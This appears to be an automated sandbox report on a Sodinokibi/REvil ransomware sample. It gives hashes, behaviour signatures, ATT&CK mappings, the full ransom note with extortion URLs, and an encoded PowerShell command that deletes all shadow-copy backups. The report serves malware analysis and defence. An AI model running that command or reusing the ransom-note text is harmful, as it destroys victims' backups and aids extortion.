Overview

overview

10

Static

static

10

17ffd90d20...e1.dll

windows7-x64

1

1caf510598...e1.exe

windows7-x64

10

1d88c47417...67.exe

windows7-x64

1

1ecb597741...af.exe

windows7-x64

2a5fe7d49f...b5.exe

windows7-x64

1

2c1aa4fa14...dc.exe

windows7-x64

8

34d62f47e1...6e.exe

windows7-x64

3

38f1b8c868...05.exe

windows7-x64

10

40d8e3dae5...04.exe

windows7-x64

10

410ee08c8a...59.exe

windows7-x64

6

423b7b37b1...42.exe

windows7-x64

1

4315b6e87c...0b.exe

windows7-x64

7

453c6fe9e1...91.exe

windows7-x64

1

4a841216cb...37.exe

windows7-x64

1

4e180437ef...a9.exe

windows7-x64

1

4fb989bc0f...00.exe

windows7-x64

10

55bdc39b0b...70.exe

windows7-x64

10

5a1b6ba55f...c3.exe

windows7-x64

1

5f056a4a7a...4c.exe

windows7-x64

7

6709db0a92...53.exe

windows7-x64

9

69add888bc...df.exe

windows7-x64

7

6af766a07c...20.exe

windows7-x64

10

719a339594...44.exe

windows7-x64

7

71a20e2700...db.exe

windows7-x64

1

7acc03a357...fd.exe

windows7-x64

7

7bd3e8a108...5f.exe

windows7-x64

1

8034ef305b...74.exe

windows7-x64

1

88be20529e...cb.exe

windows7-x64

8e6c6b616e...19.exe

windows7-x64

7

907c21dd04...b0.exe

windows7-x64

7

9b1d7a498b...21.exe

windows7-x64

7

9b7e5d2fdc...8b.exe

windows7-x64

7

Resubmissions

07-09-2023 14:45

230907-r45fysaf5s 10

07-09-2023 14:12

230907-rjbyxaad5s 10

Analysis

  • max time kernel
    139s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    07-09-2023 14:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe

  • Size

    164KB

  • MD5

    5e2627aa0eda8c0f55f2b8f075c91e42

  • SHA1

    5628a78e002734c6885a0ab6ec97aa6425bcc882

  • SHA256

    55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670

  • SHA512

    af01edf7497f19212f855f1717353227a2f35435c9adc4ca82fd4e2d31081a2d1ac1270c2330ceb20afc6c5be6f97782d8a3388f834bd9a3ecc2f7c78b6c087f

  • SSDEEP

    3072:xdHwJK3BMoFiWjmfb+HP+rnRfUMfm0Sl0/1:xNwE3q4jmfCHWtUWI6

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\Recovery\07e255630-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 07e255630. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4F974E09500AD20B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/4F974E09500AD20B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jX8QnoidfK8c3h58xcGP14uJEV9ExeDW2VRFYstcQTLrzrcXaHzD8/4udLv2X00D cjArzRj+zqP0Pc1dDUKYtc1+/O/GhBlz3FhgvZUHvN0OET31FvkYJ7pJm+cgWEta tOk7Ovmw/mBaPPDJEWp9+A35jrcBtX0gtpPOmiZEVugEUsWQ85CNGNZCv5Ef/FuH xu4ek7hUek+7lMZL/pY8ny4luZ/BA9dTD6duFDC1yLjG5EJ+E0qIpgFJvReaNAmv m2nYi1fKbLuAb1hUQU2VKIP53jP1DVmSxto+bytMT/zKRDntmjHy9ldoruYVuPmq UNPZycJv3Sph1Tn91d8tdPWurcwAHPh3LXiWFqPJNA1WIhTfrgZFQm0j0Ib4jg/l 7B9WeesCR1eDOHxTgYh4UgxlqpIPRhmH/4Ttvue0bBYqxKuAHNBXQqAGELGENrSO GRpyoluoOkKrxOD3n2kSMQWYAanOmCgkcOnVPvkxRKOoNq2Z56+/stQC3SHctTTo VtqIXDEHLj3tpRSUa3C8A4ENQ7mo+VD9YDVcQblMZ+QdeNJFJZme/XxZ9M//635W 7Cwpl2hTzQ8TRkXitB6p6A7lVbKmBFFyi7IGvBLHSTdi7bvoUcy0ZpJwN0IcIxGs KnGHo6jTBD2EJfiEdH7rDvYW5Rq+6s+JSdrP4FHeuhkUKq/LCEiP7tqCmAWcyk+B wiOHDPJdN8/Yf8bqB9h58mUvfd4ssXSvk5KOqEMWij02SFz4o1KI1xXVo00S4QV4 02SG+m3NI0LdMZdStv2BE7aGMAWtlwJSxFJrVMVjmTKLEmxMDNViZeJlqiECT6W/ EY2rDRlHoJkijLJHmezrgBEYW4nj773ZP/v6+gekEGILC2t99Uc4szW1w6ernN+u uKa/2pGHl56M9mE7SA8XoP6mpwWCUTHO/0rO0Oc4CtCs9I1Lu4z5+XNeUWMQm4LB WCHS0U6zgTEJc9ugBU7v6hcjrYwatLgSwmmvy96nQLS6rYqTRLKpRAXdES8PLKjr dgMt9Bz33V5xAQylydvGvlQ2CAFlIguKPx1+AqMImY/fRXnhuu7XBy+0TztXPNNL 6o+Qc8IzP5Cvh8E+iY/93fSkdkjeWrmJv6r74dqIDmc7RGKtmetXA49hP+GgM1Gp U0DS+uotIYEiMezIaxD0T/uzRvz1mUj0NOdIbQ8NdA0W6wleCjpdfn1o32JCJh/e LMptchfooN0Z2kiFX1jpydK1 Extension name: 07e255630 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4F974E09500AD20B

http://decryptor.top/4F974E09500AD20B

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 38 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe
    "C:\Users\Admin\AppData\Local\Temp\55bdc39b0b7686a57916d2fee2c0f9559e5b947d115bfcb6b5b255706a412670.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1716

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\07e255630-readme.txt
      Filesize

      6KB

      MD5

      eff59c5dc729e81baa09733729388e39

      SHA1

      e1d20187e463f973e9426c829777d001b2888dae

      SHA256

      df27de97934b1e2df36026786dfd5ad42973da91fc8436b0850728fbfe2553eb

      SHA512

      53972a54fd4f4d64521c4bd6eeb37717112de6194e9a8bcf388cf628f5c1b5ab6fbe4c4a041d3982b0c388f15a6f6d1d8934877766ee59d23a5c5ddc4ac574e2

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      3f134ee5bb2a0446b2d2322e8d59860d

      SHA1

      0fcfd543e4708a4ec7f7e747844e59a97ec9b0a8

      SHA256

      95375f8833035c9300d5f07aa3699c393ce8b7226f0b7c74abab6245941d1e5a

      SHA512

      7780921a086ecc3a4391f1c03f059aa3cb33225150d5aa4e367d985f12be23f0af427814dd50285a91216f8bdaa8838de4fddcc5465018f08d0d7336581354dd

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Cab13A2.tmp
      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar14CD.tmp
      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

      Download Submit
    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      e29c46747fbab8ec4a7924ba26bf8831

      SHA1

      63a2d5bf6a48c2c0a0525ebe73d29768fbc2241b

      SHA256

      6f3f083eb9b8ff0f3df85952cd3e036f1b6cd82dba30483bf192c9ca16855a37

      SHA512

      0ab7eb731987594b9189af812fd4c2ccdb7e9e3a46b8494d7f664e6a4f7a2dcac358bd9454b605f11a02b7fc86025a46c79a6fd758d919cdbedd0304b43453ec

      Download Submit
    • memory/2096-12-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

      Download
    • memory/2096-0-0x00000000001E0000-0x00000000001EA000-memory.dmp
      Filesize

      40KB

      Download
    • memory/2096-10-0x0000000002730000-0x0000000002839000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/2096-8-0x0000000000210000-0x0000000000211000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2096-6-0x0000000000200000-0x0000000000201000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2096-5-0x0000000000F10000-0x000000000103D000-memory.dmp
      Filesize

      1.2MB

      Download
    • memory/2096-11-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

      Download
    • memory/2096-25-0x0000000000210000-0x0000000000211000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2096-1-0x00000000001E0000-0x00000000001EA000-memory.dmp
      Filesize

      40KB

      Download
    • memory/2096-4-0x00000000001F0000-0x00000000001F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2096-3-0x0000000000680000-0x000000000071F000-memory.dmp
      Filesize

      636KB

      Download
    • memory/2096-9-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

      Download
    • memory/2096-2-0x0000000000D30000-0x0000000000DF9000-memory.dmp
      Filesize

      804KB

      Download
    • memory/2096-7-0x0000000000400000-0x000000000041F000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2572-21-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2572-24-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2572-26-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2572-23-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2572-22-0x0000000001E90000-0x0000000001F10000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2572-19-0x0000000001FB0000-0x0000000001FB8000-memory.dmp
      Filesize

      32KB

      Download
    • memory/2572-20-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2572-18-0x000000001B170000-0x000000001B452000-memory.dmp
      Filesize

      2.9MB

      Download